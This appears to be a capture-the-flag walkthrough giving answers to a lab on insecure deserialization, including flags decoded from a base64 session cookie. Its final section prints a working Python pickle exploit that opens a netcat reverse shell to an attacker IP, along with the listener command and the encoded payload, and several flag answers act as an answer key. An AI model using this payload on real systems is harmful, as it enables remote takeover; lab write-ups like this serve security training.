Task 21~26
Insecure Deserialization
Section titled “Insecure Deserialization ”Who developed the Tomcat application?
Section titled “Who developed the Tomcat application? ”Answer
Section titled “Answer ”The Apache Software Foundation
What type of attack that crashes services can be performed with insecure deserialization?
Section titled “What type of attack that crashes services can be performed with insecure deserialization? ”Answer
Section titled “Answer ”denial of service
Insecure Deserialization - Objects
Section titled “Insecure Deserialization - Objects ”Select the correct term of the following statement:
Section titled “Select the correct term of the following statement: ”Answer
Section titled “Answer ”A Behaviour
Insecure Deserialization - Deserialization
Section titled “Insecure Deserialization - Deserialization ”What is the name of the base-2 formatting that data is sent across a network as?
Section titled “What is the name of the base-2 formatting that data is sent across a network as? ”Answer
Section titled “Answer ”binary
Insecure Deserialization - Cookies
Section titled “Insecure Deserialization - Cookies ”
If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?
Section titled “If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be? ”Answer
Section titled “Answer ”webapp.com/login
What is the acronym for the web technology that Secure cookies work over?
Section titled “What is the acronym for the web technology that Secure cookies work over? ”Answer
Section titled “Answer ”https
Insecure Deserialization - Cookies Practical
Section titled “Insecure Deserialization - Cookies Practical ”1st flag (cookie value)
Section titled “1st flag (cookie value) ”
echo -n "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAZDYzOWIzNzUwMjM5NDM3ZTk4ZGZmOWM3NjEwOTYxZjlxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==" |base64 --decode}q(X sessionIdqX d639b3750239437e98dff9c7610961f9qX encodedflagqXTHM{good_old_base64_huh}qu.%Answer
Section titled “Answer ”qXTHM{good_old_base64_huh}
2nd flag (admin dashboard)
Section titled “2nd flag (admin dashboard) ”Change user to admin
Answer
Section titled “Answer ”THM{heres_the_admin_flag}
Insecure Deserialization - Code Execution
Section titled “Insecure Deserialization - Code Execution ”- on local machine
Run nc listener
nc -lvnp 4444Edit the python script with your VPN IP
import pickleimport sysimport base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 10.18.1.159 4444 > /tmp/f'
class rce(object): def __reduce__(self): import os return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))Run python script and get the base64 command.
gASVdAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFlybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTguMS4xNTkgNDQ0NCA+IC90bXAvZpSFlFKULg==Edit the encodedPayload and get remote access
cat /home/cmnatic/flag.txtAnswer
Section titled “Answer ”4a69a7ff9fd68